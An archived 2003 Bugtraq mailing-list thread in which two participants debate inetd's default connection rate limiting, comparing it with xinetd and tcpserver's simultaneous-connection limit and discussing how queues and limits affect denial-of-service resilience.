Kommentar i text 10658630 av 3APA3A <3APA3A@security.nnov.ru>
10658630 2003-09-08 23:56 +0400 /34 rader/ 3APA3A <3APA3A@security.nnov.ru>
Importerad: 2003-09-09 00:01 av Brevbäraren
Extern mottagare: Paul Szabo <psz@maths.usyd.edu.au>
Extern kopiemottagare: bugtraq@securityfocus.com
Externa svar till: 3APA3A@security.nnov.ru
Mottagare: Bugtraq (import) <28877>
Kommentar till text 10658134 av Paul Szabo <psz@maths.usyd.edu.au>
Ärende: Re[4]: 11 years of inetd default insecurity?
------------------------------------------------------------
From: 3APA3A <3APA3A@security.nnov.ru>
To: psz@maths.usyd.edu.au (Paul Szabo)
Cc: bugtraq@securityfocus.com
Message-ID: <722336921.20030908235627@security.nnov.ru>
Hello Paul,
Monday, September 8, 2003, 11:11:12 PM, you wrote:
>>
>> -s limits number of processes invoked from same IP. You can additionally
>> use -c to prevent distributed attack. It doesn't allow to DoS box and
>> doesn't disable service for 10 minutes.
PS> Note that my (DEC/Compaq/HP Tru64) inetd does not have -c or -s
options. PS> The only safe way is to use a sensible -R and
tcp_wrappers. Or upgrade to PS> Linux and xinetd...
It proofs code needs to be rewritten. I don't understand why
limitation is on per minute, not per second base. Oh no - I
understand. This is result of the code was written more than
10 years ago. But what I completely misunderstand is how
disabling service for 10 minutes increases security. It's because
I'm green, stupid and brain damaged.
IMHO reasonable behavior is limiting a number of requests accepted
per second without disabling service. But this code became a kind
of saint cow. Only hope is young monsters like xinetd will rid this
dinosaur off as a result of evolution.
--
/3APA3A
(10658630) /3APA3A <3APA3A@security.nnov.ru>/(Ombruten)
10663710 2003-09-09 19:25 +0200 /24 rader/ <bjornar.bjorgum.larsen@ementor.no>
Importerad: 2003-09-09 21:24 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <28904>
Ärende: RE: 11 years of inetd default insecurity?
------------------------------------------------------------
From: <bjornar.bjorgum.larsen@ementor.no>
To: <bugtraq@securityfocus.com>
Message-ID: <FD72AF7813F1294C95279EC6D9784A2F46BCF0@100NOOSLMSG004.common.alpharoot.net>
Dan Stromberg wrote:
> So DJB's program basically has a large listen queue, and goes
> into queue-only mode after 40 concurrent connections?
tcpserver -c n ...
where n is the number of simultaneous connections. Defaults to 40.
> If that's the case, then there's still a DOS
> - just fill the listen queue with so much stuff
> that connections aren't serviced for a long time.
IMHO we do want a limit on simultaneous connections and a queue after
the limit's reached: No limit => Attacker may make one service eat
all resources on your system. No queue => Your system will be
intolerant of sudden bursts: When the limit's reached new connections
will be dropped even when there's no real DoS.
If your limit is not based on maximum simultaneous connections, but
on eg. maximum resource concumption, the queue argument still holds.
:) Bjørnar
(10663710) /<bjornar.bjorgum.larsen@ementor.no>/(Ombruten)